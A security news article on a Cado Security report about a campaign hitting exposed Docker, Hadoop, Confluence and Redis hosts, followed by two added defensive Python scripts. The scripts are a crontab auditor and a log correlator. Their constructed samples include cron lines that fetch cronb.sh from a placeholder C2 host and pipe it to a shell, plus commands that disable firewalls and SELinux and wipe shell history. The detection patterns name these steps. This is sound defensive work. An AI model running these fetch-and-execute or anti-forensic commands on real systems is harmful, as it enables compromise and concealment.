A new attack campaign is targeting publicly exposed Docker, Hadoop, Confluence, and Redis deployments by exploiting common misconfigurations and known vulnerabilities. The attackers deploy previously unseen payloads, including four binaries written in Golang.
“Once initial access is achieved, a series of shell scripts and general Linux attack techniques are used to deliver a cryptocurrency miner, spawn a reverse shell, and enable persistent access to the compromised hosts,” researchers from Cado Security said in a new report. While attribution cannot be made with certainty, the shell scripts observed in the campaign have some similarities to those previously used by the known threat actors TeamTNT and WatchDog.
Complex multi-stage infection chain via shell scripts
The infection chain of this campaign is quite complex, totaling over 10 shell scripts and numerous binaries, multiple persistence mechanisms, backup payload delivery methods, anti-forensics techniques, user-mode rootkits, network scanning tools and exploits. Cado first observed the attack on one of its Docker honeypots, which was intentionally configured insecurely. The attackers connected to the Docker Engine API, spawned a new container based on Alpine Linux, and mounted the host’s root file system to a temporary directory inside the container.
This technique is not new and is commonly used in Docker attacks to write a malicious cron job on the host system that will then execute the attackers’ code. In this new campaign, the attackers wrote a file to the /usr/bin/vurl path and created a cron job to execute some base64-encoded shell commands.
The shell code executed by cron uses the vurl script to retrieve a first-stage payload from a hardcoded command-and-control server over a TCP connection. If this method fails, a second cron job is created that uses Python and the urllib2 library to retrieve an alternate payload. The vurl payload is a shell script called cronb.sh whose goal is to make sure the chattr (change file attributes) utility is installed and to check whether the current account is root. This will determine the next payload, yet another shell script called ar.sh whose purpose is to prepare the system for the next stages of infection.
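The persistence described above leaves a recognizable trace on the host: a crontab entry that pipes a base64 blob into a shell, and a decoded body that references /usr/bin/vurl, cronb.sh, or a Python urllib2 fallback. The following is an added example of a small crontab audit, written for this article and not code from Cado Security or from the campaign; the indicator list is drawn from the names the report gives, the log sample is constructed, and the host and URL in it are placeholders.

```python
import base64
import re
from typing import Dict, List

# Indicators taken from the report's description of the campaign (the
# /usr/bin/vurl dropper, the cronb.sh and ar.sh stages, the urllib2 fallback,
# and the chattr dependency). A starting point, not a complete signature.
SUSPICIOUS_TOKENS = ("/usr/bin/vurl", "cronb.sh", "ar.sh", "urllib2", "/dev/tcp/", "chattr")
# Require the token not to be glued to a preceding word character so that
# "ar.sh" does not fire on "bar.sh".
TOKEN_PATTERNS = [(tok, re.compile(r"(?<![\w.-])" + re.escape(tok))) for tok in SUSPICIOUS_TOKENS]

# `echo <base64> | base64 -d` (optionally quoted): the shape used to keep the
# real command body out of a casual look at the crontab.
B64_PIPE = re.compile(
    r"echo\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(?:-d|--decode)\b"
)


def decode_b64_commands(line: str) -> List[str]:
    """Return the decoded body of every base64-piped command found in a cron line."""
    decoded = []
    for match in B64_PIPE.finditer(line):
        try:
            raw = base64.b64decode(match.group(1), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        decoded.append(raw.decode("utf-8", errors="replace"))
    return decoded


def audit_cron_line(line: str) -> Dict[str, object]:
    """Classify one crontab line, checking the literal text and any decoded payload."""
    text = line.strip()
    reasons: List[str] = []
    if not text or text.startswith("#"):
        return {"line": line, "suspicious": False, "reasons": reasons, "decoded": []}

    decoded = decode_b64_commands(text)
    if decoded:
        reasons.append("base64-encoded command piped to a shell")
    for candidate in [text, *decoded]:
        for token, pattern in TOKEN_PATTERNS:
            reason = f"references {token}"
            if pattern.search(candidate) and reason not in reasons:
                reasons.append(reason)
    return {"line": line, "suspicious": bool(reasons), "reasons": reasons, "decoded": decoded}


def audit_crontab(lines: List[str]) -> List[Dict[str, object]]:
    """Return only the findings for lines that tripped at least one rule."""
    return [r for r in map(audit_cron_line, lines) if r["suspicious"]]


def _b64(text: str) -> str:
    return base64.b64encode(text.encode()).decode()


# Constructed sample crontab for this example; host and URL are placeholders.
SAMPLE_CRONTAB = [
    "# constructed sample - not the crontab from the real campaign",
    "0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf",
    "* * * * * root echo " + _b64("/usr/bin/vurl http://c2.example.invalid/cronb.sh | sh")
    + " | base64 -d | bash",
    "*/5 * * * * root python -c 'import urllib2; urllib2.urlopen(\"http://c2.example.invalid/backup.sh\")'",
]

if __name__ == "__main__":
    for finding in audit_crontab(SAMPLE_CRONTAB):
        print(finding["line"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

Run it against /etc/crontab, the files under /etc/cron.d, and each user's crontab; the decoded body is returned alongside the finding so an analyst can read what the job would actually have run instead of only the encoded blob.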
First, it uses the netstat command to check whether connections to the internet on port 80 are allowed. It then disables the firewalld and iptables Linux firewalls, deletes the shell history to cover its tracks, disables the SELinux security mechanism and adds public DNS servers to /etc/resolv.conf to make sure future C2 domains are resolved correctly.
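Each of the ar.sh preparation steps is unremarkable on its own (an administrator stops firewalld during maintenance all the time), but several of them from the same host in quick succession is the pattern worth alerting on. The following is an added example of that correlation over process-execution records, written for this article and not code from Cado Security; the log line format is an assumption made for the example, the rule patterns are illustrative, and the hostnames and nameserver address in the sample are constructed placeholders.

```python
import re
from collections import defaultdict
from typing import Dict, List

# Each rule family corresponds to one step the report attributes to ar.sh.
# Patterns are illustrative; tune them to the shell variants seen in your fleet.
RULES: Dict[str, List[re.Pattern]] = {
    "firewall_disabled": [
        re.compile(r"\b(?:systemctl|service)\s+(?:stop|disable)\s+(?:firewalld|iptables)\b"),
        re.compile(r"\biptables\s+(?:-F|--flush)\b"),
        re.compile(r"\bufw\s+disable\b"),
    ],
    "history_cleared": [
        re.compile(r"\bhistory\s+-c\b"),
        re.compile(r"\brm\b.*\.bash_history"),
        re.compile(r"\b(?:unset\s+HISTFILE|HISTFILE=/dev/null)\b"),
    ],
    "selinux_disabled": [
        re.compile(r"\bsetenforce\s+0\b"),
        re.compile(r"SELINUX=disabled"),
    ],
    "resolver_modified": [
        re.compile(r">>?\s*/etc/resolv\.conf\b"),
        re.compile(r"\bchattr\b.*/etc/resolv\.conf\b"),
    ],
}

# Assumed log shape for this example: <timestamp> <host> uid=<n> cmd="<command>".
# A real deployment would feed auditd execve records or an EDR process stream.
LOG_RE = re.compile(r'^(?P<ts>\S+)\s+(?P<host>\S+)\s+uid=(?P<uid>\d+)\s+cmd="(?P<cmd>.*)"$')


def classify_command(cmd: str) -> List[str]:
    """Return every rule family that the command line matches."""
    return [name for name, patterns in RULES.items() if any(p.search(cmd) for p in patterns)]


def summarize_hosts(lines: List[str]) -> Dict[str, List[str]]:
    """Group matched rule families by host; unparsable lines are skipped."""
    hits: Dict[str, set] = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        for family in classify_command(m.group("cmd")):
            hits[m.group("host")].add(family)
    return {host: sorted(families) for host, families in hits.items()}


def alert_hosts(lines: List[str], threshold: int = 3) -> List[str]:
    """Hosts on which at least `threshold` distinct families fired."""
    return sorted(h for h, fams in summarize_hosts(lines).items() if len(fams) >= threshold)


# Constructed sample; hostnames and the nameserver (TEST-NET-3 range) are placeholders.
SAMPLE_LOG = [
    '2024-05-02T10:00:01Z web-01 uid=0 cmd="netstat -ant"',
    '2024-05-02T10:00:02Z web-01 uid=0 cmd="systemctl stop firewalld"',
    '2024-05-02T10:00:03Z web-01 uid=0 cmd="iptables -F"',
    '2024-05-02T10:00:04Z web-01 uid=0 cmd="history -c"',
    '2024-05-02T10:00:05Z web-01 uid=0 cmd="setenforce 0"',
    '2024-05-02T10:00:06Z web-01 uid=0 cmd="echo nameserver 203.0.113.53 >> /etc/resolv.conf"',
    '2024-05-02T10:05:00Z db-01 uid=0 cmd="systemctl stop firewalld"',
    '2024-05-02T11:00:00Z db-01 uid=1000 cmd="ls -la /var/log"',
]

if __name__ == "__main__":
    for host, families in summarize_hosts(SAMPLE_LOG).items():
        print(host, families)
    print("alert:", alert_hosts(SAMPLE_LOG))
```

The grouping here is per host over the whole input; in production, bucket by host and a short time window (the script runs these commands within seconds of each other) so that a legitimate firewall change on Monday and a history wipe on Friday do not combine into an alert.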